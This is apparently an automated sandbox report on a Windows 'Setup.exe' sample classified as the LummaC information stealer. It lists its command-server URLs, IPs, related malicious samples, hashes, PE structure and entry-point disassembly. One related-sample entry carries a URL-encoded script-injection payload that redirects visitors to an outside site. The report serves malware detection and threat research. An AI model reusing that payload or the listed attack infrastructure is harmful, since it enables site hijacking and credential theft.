                                                                    https://cheapptaxysu.click/lSetup.exe, 00000000.00000002.2043317533.0000000000889000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://cheapptaxysu.click/Setup.exe, 00000000.00000002.2043317533.0000000000889000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043397401.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1827827492.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://support.mozilla.org/products/firefoxgro.allSetup.exe, 00000000.00000003.1967747758.0000000003226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Setup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#Setup.exefalse
                                                                            high
                                                                            http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0Setup.exefalse
                                                                              high
                                                                              https://cheapptaxysu.click/apiLSetup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043435488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://sectigo.com/CPS0Setup.exefalse
                                                                                high
                                                                                http://crl.m&JaSetup.exe, 00000000.00000003.1817406294.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1827827492.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cheapptaxysu.click/6Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgSetup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cheapptaxysu.click/apiOSetup.exe, 00000000.00000003.1994725877.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaSetup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://ocsp.rootca1.amazontrust.com0:Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Setup.exe, 00000000.00000003.1829687850.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1953120474.0000000003157000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1829793650.0000000003157000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1952888844.0000000003157000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.ecosia.org/newtab/Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://ocsp.sectigo.com0&Setup.exefalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup.exe, 00000000.00000003.1967747758.0000000003226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.cloudflare.com/5xx-error-landingSetup.exe, 00000000.00000003.1817406294.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1817384635.000000000092A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1827827492.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://ac.ecosia.org/autocomplete?q=Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgSetup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zSetup.exefalse
                                                                                                          high
                                                                                                          https://support.microsofSetup.exe, 00000000.00000003.1829687850.00000000031A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSetup.exe, 00000000.00000003.1829793650.0000000003132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://cheapptaxysu.click/.?&Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043435488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  172.67.177.88
                                                                                                                  cheapptaxysu.clickUnited States
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1582556
                                                                                                                  Start date and time:2024-12-30 21:28:05 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 4m 6s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:4
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:Setup.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                                                  EGA Information:Failed
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  • Number of executed functions: 0
                                                                                                                  • Number of non-executed functions: 2
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Stop behavior analysis, all processes terminated
                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 20.12.23.50, 13.107.246.45
                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                  • Execution Graph export aborted for target Setup.exe, PID 7412 because there are no executed function
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                  • VT rate limit hit for: Setup.exe
                                                                                                                  TimeTypeDescription
                                                                                                                  15:29:10API Interceptor8x Sleep call for process: Setup.exe modified
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  172.67.177.88Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                        http://click.accelo.com/ls/click?upn=c0iB0xQ4ZTg13yjvbQXmi3E3-2FYICuYinqI3Eu3HkLVg-3DaItC_JvGHKpbJferqo4wFvApnpaVwt1KUo-2BlGINtA-2F491YuuYKjAyUTOOwaM47XSKrX4SnW-2Fau-2F6FV-2Bn4CFCF2r0LA6vLlt1xoh9D-2F06a1peHqd6CpkWJ4zPSDCvwvCjm6-2BMoLYRcc-2Fx4Iapejg1Bnr-2FecmA6tdCw5t2p0JBd5znAms58ofvnjqcczVMJYyOQy58ZhyqExzVmv7Op27kcIqI2EViuk0T4gg51j82pQCW-2B1A-2F5ZEsa5g1crqa2JDcBSrNaoTtZfZCjTZguyx-2FjCmC3ySkusy5GIeIKkWbLfmKXJ6PwHXv-2BxhYKSlWnehJ9X2Pu#jmyllrvqkxwa=qeqokzfpdnls1e564ta00lgjk002vx4020750f0362005gw7yGet hashmaliciousUnknownBrowse
                                                                                                                          https://storage.googleapis.com/tf3no4swz21zlasg/75752b9.html#FDm8vwZK.aspx?fRl9xNccwwPcczDyScdcNRddcH77xncsXcbbb4XGet hashmaliciousUnknownBrowse
                                                                                                                            https://hantal.fanlink.tv/o7IZGet hashmaliciousUnknownBrowse
                                                                                                                              https://inlook.fi/?s=%22%2F%3C%2Fscript%3E%3Cscript%3Ewindow%5B%27location%27%5D%5B%27replace%27%5D%28%5B%27h%27%2C%27t%27%2C%27t%27%2C%27p%27%2C%27s%27%2C%27%3A%27%2C%27%2F%27%2C%27%2F%27%2C%27j%27%2C%27i%27%2C%27n%27%2C%27x%27%2C%27m%27%2C%27u%27%2C%27x%27%2C%27.%27%2C%27c%27%2C%27o%27%2C%27m%27%2C%27%2F%27%2C%271%27%2C%270%27%2C%270%27%2C%278%27%2C%273%27%2C%275%27%2C%27e%27%2C%274%27%2C%27e%27%2C%275%27%2C%27d%27%2C%278%27%2C%275%27%2C%274%27%2C%27e%27%2C%274%27%2C%278%27%2C%270%27%2C%270%27%5D%5B%27join%27%5D%28%27%27%29%29%2Cdocument%5B%27body%27%5D%5B%27style%27%5D%5B%27opacity%27%5D%3D0x0%3B%3C%2Fscript%3EGet hashmaliciousPhisherBrowse
                                                                                                                                http://yhtc.waitslotvip.shop/4twZzp2966ZfQW273ylszwngjeo14478IENNWZNBABFXSHI196580PMUT9061Y12Get hashmaliciousPhisherBrowse
                                                                                                                                  http://kugs.vipku.org/4EameH2979CPbk273kjuzxrriqa14014SCJHJGOXVHMJBHR889062RABJ9063b12Get hashmaliciousPhisherBrowse
                                                                                                                                    http://9k1.lawstore.me/?dD1jJmQ9MjIwMjUmbD01NDIzJmM9MTU5ODA5JmF1PTA=Get hashmaliciousPhisherBrowse
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      cheapptaxysu.clickSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                      • 104.21.67.146
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 104.21.67.146
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                      • 104.21.67.146
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                      • 104.21.67.146
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                      • 104.21.67.146
                                                                                                                                      file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                                                      • 104.21.67.146
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      CLOUDFLARENETUSX-mas_2.3.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.190.223
                                                                                                                                      ReploidReplic.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 104.21.48.1
                                                                                                                                      https://compliance-central.com/route/ed5305641af2fd214861ba268e4a42aa2938b075/Get hashmaliciousUnknownBrowse
                                                                                                                                      • 1.1.1.1
                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 104.21.96.1
                                                                                                                                      GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 104.21.96.1
                                                                                                                                      AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 104.21.16.1
                                                                                                                                      web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.154.95
                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.208.58
                                                                                                                                      SharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                      • 104.21.64.143
                                                                                                                                      Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1X-mas_2.3.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      ReploidReplic.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      SharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                      • 172.67.177.88
                                                                                                                                      No context
                                                                                                                                      No created / dropped files found
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.951386087270897
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:Setup.exe
                                                                                                                                      File size:3'317'708 bytes
                                                                                                                                      MD5:79d5cc6637e2c1502789c2d7d610916c
                                                                                                                                      SHA1:e8e4f4c2c8edc879da6a157a30215e5c3c0d3562
                                                                                                                                      SHA256:9ddb77296f5248b63b1499b6d78b8707b083518140b789902e037b69260baeb8
                                                                                                                                      SHA512:c023b4415590409be39d4e0ccfdfd6fba7e30693c001ce044a0ef4b6c2fd9b67253f83c599c2d0dc3aac3d23ae690addfe83f105b10037a2506f5e1ea3672469
                                                                                                                                      SSDEEP:49152:JLcLx9Fx072FxeBJhCp8bC6BJ5PE072FxeBJhCp8bC6B:FcFaaFxEb4kC0haFxEb4kC
                                                                                                                                      TLSH:D3E522C4B1B13F20F4B3A2711195FE36812B5D2E69258C43A3E8DC2F3BB969DDE85161
                                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                      Icon Hash:870147476127061f
                                                                                                                                      Entrypoint:0x409c40
                                                                                                                                      Entrypoint Section:CODE
                                                                                                                                      Digitally signed:true
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:1
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:1
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:1
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                                                                      Signature Valid:false
                                                                                                                                      Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                      Error Number:-2146869232
                                                                                                                                      Not Before, Not After
                                                                                                                                      • 03/04/2024 01:00:00 04/04/2027 00:59:59
                                                                                                                                      Subject Chain
                                                                                                                                      • CN=FireDaemon Technologies Limited, O=FireDaemon Technologies Limited, S=Suffolk, C=GB, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=GB, SERIALNUMBER=05901601
                                                                                                                                      Version:3
                                                                                                                                      Thumbprint MD5:F923D90F58A0DABA233C9E35336C5B42
                                                                                                                                      Thumbprint SHA-1:C7FE6BFD5466557472B379DE462A5BF44735FDC8
                                                                                                                                      Thumbprint SHA-256:B82B866DF2064BE26881225D2E8E201EED634C5039801EE680E1969A9BF06963
                                                                                                                                      Serial:72AA1D3669C10A617E12E386EC62F7F7
                                                                                                                                      Instruction
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      add esp, FFFFFFC4h
                                                                                                                                      push ebx
                                                                                                                                      push esi
                                                                                                                                      push edi
                                                                                                                                      xor eax, eax
                                                                                                                                      mov dword ptr [ebp-10h], eax
                                                                                                                                      mov dword ptr [ebp-24h], eax
                                                                                                                                      call 00007F7A4C81E03Bh
                                                                                                                                      call 00007F7A4C81F242h
                                                                                                                                      call 00007F7A4C81F4D1h
                                                                                                                                      call 00007F7A4C821508h
                                                                                                                                      call 00007F7A4C82154Fh
                                                                                                                                      call 00007F7A4C823E7Eh
                                                                                                                                      call 00007F7A4C823FE5h
                                                                                                                                      xor eax, eax
                                                                                                                                      push ebp
                                                                                                                                      push 0040A2FCh
                                                                                                                                      push dword ptr fs:[eax]
                                                                                                                                      mov dword ptr fs:[eax], esp
                                                                                                                                      xor edx, edx
                                                                                                                                      push ebp
                                                                                                                                      push 0040A2C5h
                                                                                                                                      push dword ptr fs:[edx]
                                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                                      mov eax, dword ptr [0040C014h]
                                                                                                                                      call 00007F7A4C824A4Bh
                                                                                                                                      call 00007F7A4C82467Eh
                                                                                                                                      lea edx, dword ptr [ebp-10h]
                                                                                                                                      xor eax, eax
                                                                                                                                      call 00007F7A4C821B38h
                                                                                                                                      mov edx, dword ptr [ebp-10h]
                                                                                                                                      mov eax, 0040CDE8h
                                                                                                                                      call 00007F7A4C81E0E7h
                                                                                                                                      push 00000002h
                                                                                                                                      push 00000000h
                                                                                                                                      push 00000001h
                                                                                                                                      mov ecx, dword ptr [0040CDE8h]
                                                                                                                                      mov dl, 01h
                                                                                                                                      mov eax, 0040738Ch
                                                                                                                                      call 00007F7A4C8223C7h
                                                                                                                                      mov dword ptr [0040CDECh], eax
                                                                                                                                      xor edx, edx
                                                                                                                                      push ebp
                                                                                                                                      push 0040A27Dh
                                                                                                                                      push dword ptr fs:[edx]
                                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                                      call 00007F7A4C824ABBh
                                                                                                                                      mov dword ptr [0040CDF4h], eax
                                                                                                                                      mov eax, dword ptr [0040CDF4h]
                                                                                                                                      cmp dword ptr [eax+0Ch], 01h
                                                                                                                                      jne 00007F7A4C824BFAh
                                                                                                                                      mov eax, dword ptr [0040CDF4h]
                                                                                                                                      mov edx, 00000028h
                                                                                                                                      call 00007F7A4C8227C8h
                                                                                                                                      mov edx, dword ptr [000000F4h]
                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x66e00.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x3270bc0x2f10
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000x0.reloc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      CODE0x10000x93640x9400872cf326ad19dd48caa30dae9776ac00False0.6585726351351351data6.740438152404276IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      DATA0xb0000x24c0x400e8f82382eefca31b62f6a8c8a52ff421False0.3154296875data2.753482278202086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      BSS0xc0000xe4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                      .rsrc0x110000x66e000x66e00376eee8d3246c33a580505df008975a6False0.5722039223876063data6.927095623177584IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_ICON0x112cc0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 30236 x 30236 px/mEnglishUnited States0.09360582041878623
                                                                                                                                      RT_STRING0x21af40x2f2data0.35543766578249336
                                                                                                                                      RT_STRING0x21de80x30cdata0.3871794871794872
                                                                                                                                      RT_STRING0x220f40x2cedata0.42618384401114207
                                                                                                                                      RT_STRING0x223c40x68data0.75
                                                                                                                                      RT_STRING0x2242c0xb4data0.6277777777777778
                                                                                                                                      RT_STRING0x224e00xaedata0.5344827586206896
                                                                                                                                      RT_RCDATA0x225900x2cdata1.1818181818181819
                                                                                                                                      RT_GROUP_ICON0x225bc0x14dataEnglishUnited States1.15
                                                                                                                                      RT_VERSION0x225d00x4b8COM executable for DOSEnglishUnited States0.3344370860927152
                                                                                                                                      RT_MANIFEST0x22a880x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                                                                                                      DLLImport
                                                                                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                                                                      user32.dllMessageBoxA
                                                                                                                                      oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
